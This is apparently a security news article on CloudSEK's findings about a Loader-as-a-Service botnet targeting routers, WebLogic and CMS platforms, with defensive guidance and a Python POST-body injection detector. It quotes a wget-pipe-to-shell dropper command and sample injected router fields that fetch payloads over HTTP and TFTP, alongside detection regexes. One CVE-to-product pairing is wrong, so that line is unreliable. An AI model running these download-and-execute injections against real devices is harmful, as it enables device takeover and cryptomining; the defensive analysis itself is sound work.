CloudSEK has uncovered a sophisticated Loader-as-a-Service botnet campaign spanning the last six months, leveraging exposed command-and-control logs to orchestrate attacks against SOHO routers, embedded Linux devices, and enterprise applications.
The threat actors exploit unsanitized POST parameters—such as NTP, syslog, and hostname fields—alongside default credentials and known CVEs in WebLogic, WordPress, and vBulletin systems to achieve remote code execution.
Between July and August 2025, attack volume surged by 230%, delivering multi-architecture malware including Morte binaries and cryptomining payloads.
CloudSEK continues to monitor the operation and has alerted impacted customers whose tech stacks match targeted vectors.
CloudSEK’s TRIAD team first identified the operation during routine scans for malicious infrastructure.
The server contained command-and-control logs issued by the threat actors over the last six months, which gave insight into their attack vectors and the infrastructure in use.
Investigation of the exposed control panel logs revealed a methodical sequence of modules, each corresponding to a stage in the attack chain. The key log markers in square brackets denote distinct functions:
[ReplyPageLogin] captures login attempts against web-admin interfaces, logging both default-credential probes and brute-force sprays.
Successful authentication feeds into subsequent injection stages.
[ConfigSystemCommand] and [SystemCommand] record injection commands such as wget -qO- http://IP/rondo.*.sh | sh, busybox fetches, or TFTP/FTP-based chains, indicating delivery of minimal dropper scripts.
[ReplyErrorPage] and [ReplySuccessPage] signal execution failures or confirmations, guiding the operator’s retry logic or flagging compromised hosts for payload staging.
[ReplyDeviceInfo] logs post-exploit reconnaissance, collecting MAC addresses, firmware versions, and reachable services to tailor payload selection—whether for sustained C2, cryptomining, or resale of access.
The campaign systematically targets:
- Oracle WebLogic servers via console/servlet RCE.
- SOHO routers through vulnerable UI pages (e.g., wlwps.htm, wan_dyna.html) and unsanitized fields (ntp, remote_syslog, hostname, ping).
- Embedded Linux devices by dropping multi-architecture binaries (morte.x86, morte.x86_64).
- CMS platforms via CVE-2019-17574 (Popup Maker), CVE-2019-16759 (WordPress), and vBulletin CVE-2012-1823.
Attackers employ multiple protocols for payload delivery—HTTP, TFTP, FTP—with BusyBox wrappers to maximize compatibility across device types.

Default credentials and automated sprays facilitate initial access. Redundant drop hosts spanning diverse IP ranges ensure resilience against takedowns.
Post-compromise, operators deploy JSON-RPC miners or Mirai-style bots, leveraging hijacked resources for cryptomining and DDoS campaigns.
Enterprise Targeting: The inclusion of WebLogic deserialization, Struts2 OGNL injection, and JNDI exploits elevates risk for data exfiltration, lateral network movement, and secondary payloads such as ransomware.
Infrastructure Compromise: Corporate edge routers face bandwidth exhaustion, time-sensitive system disruption via NTP poisoning, and DNS manipulation through diagnostic interfaces.
Third-Party Risk: Small business routers and IoT devices serve as beachheads for attacks against enterprise clients, while compromised service-provider infrastructure can amplify reach.
Operational impacts include degraded network performance from botnet recruitment, increased incident response workload from multi-vector attacks, and greater demand for threat hunting across diverse surfaces.
- Egress Blocking: Deny outbound HTTP, HTTPS, TFTP, and FTP from IoT segments.
- Inventory & Isolation: Identify internet-exposed admin UIs; isolate devices showing injected POST patterns.
- Credential & Firmware Updates: Enforce unique credentials; apply vendor patches; disable remote management features if unnecessary.
Detection (SOC/SIEM)
- Implement Sigma rules to detect suspicious POST parameters containing wget, curl, or |sh.
- Deploy Suricata/Snort regex alerts for download-and-execute patterns in HTTP bodies.
- Monitor for unusual JSON-RPC traffic indicating cryptomining activity.
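The detection guidance above, as an added example that is not part of the CloudSEK report or this article: a small Python checker that scans URL-encoded POST bodies for the download-and-execute patterns and the injection-prone router fields (ntp, remote_syslog, hostname, ping) the report names. The sample bodies, the IP 198.51.100.10 and the file names are constructed for the demonstration.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs

# Router UI fields the report identifies as unsanitized injection points.
SUSPECT_PARAMS = {"ntp", "remote_syslog", "hostname", "ping"}

# Download-and-execute indicators from the report's detection guidance.
DL_EXEC = re.compile(
    r"(?:\bwget\b|\bcurl\b|\btftp\b|\bbusybox\b|\|\s*sh\b|/tmp/morte\.)",
    re.IGNORECASE,
)
# Shell metacharacters that have no business in a hostname or NTP server value.
SHELL_META = re.compile(r"[;`|&]|\$\(")


def score_post_body(body: str) -> list[dict]:
    """Return one finding per parameter value that looks like command injection.

    High severity: a download-and-execute token is present in any field.
    Medium severity: only shell metacharacters, but in a known-abused field.
    """
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        known_field = name.lower() in SUSPECT_PARAMS
        for value in values:
            hits = DL_EXEC.findall(value)
            meta = bool(SHELL_META.search(value))
            if hits or (meta and known_field):
                findings.append({
                    "param": name,
                    "value": value,
                    "patterns": hits,
                    "known_field": known_field,
                    "severity": "high" if hits else "medium",
                })
    return findings


# Constructed sample bodies, URL-encoded as a browser or bot would send them.
SAMPLE_BODIES = [
    "ntp=pool.ntp.org&timezone=UTC",                                        # benign
    "ntp=pool.ntp.org%3Bwget+-qO-+http%3A%2F%2F198.51.100.10%2Frondo.x86.sh+%7C+sh&timezone=UTC",
    "hostname=router%60busybox+tftp+-g+-r+morte.mips+198.51.100.10%60",     # tftp chain
    "ping=8.8.8.8%3Bid",                                                    # metachar only
    "comment=hello%3Bworld",                                                # not a suspect field
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body[:60], "->", score_post_body(body))
```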
Prevention (Network/SecOps)
- Enforce strict egress filtering to allow only whitelisted update servers for firmware and NTP.
- Segment IoT and embedded devices from core production networks.
- Harden web UIs behind VPN or jump-box access.
Response (IR)
- Quarantine devices exhibiting outbound mining or unexpected /tmp/morte.* executions.
- Collect forensic artifacts: shell command logs, process trees, and temporary filesystem contents.
- Reimage or replace unpatchable devices to restore integrity.
CloudSEK forecasts continued evolution of this Loader-as-a-Service operation, with expanded device targeting and payload sophistication. Vigilant monitoring, rapid remediation, and layered defense strategies are critical to mitigate this emerging threat.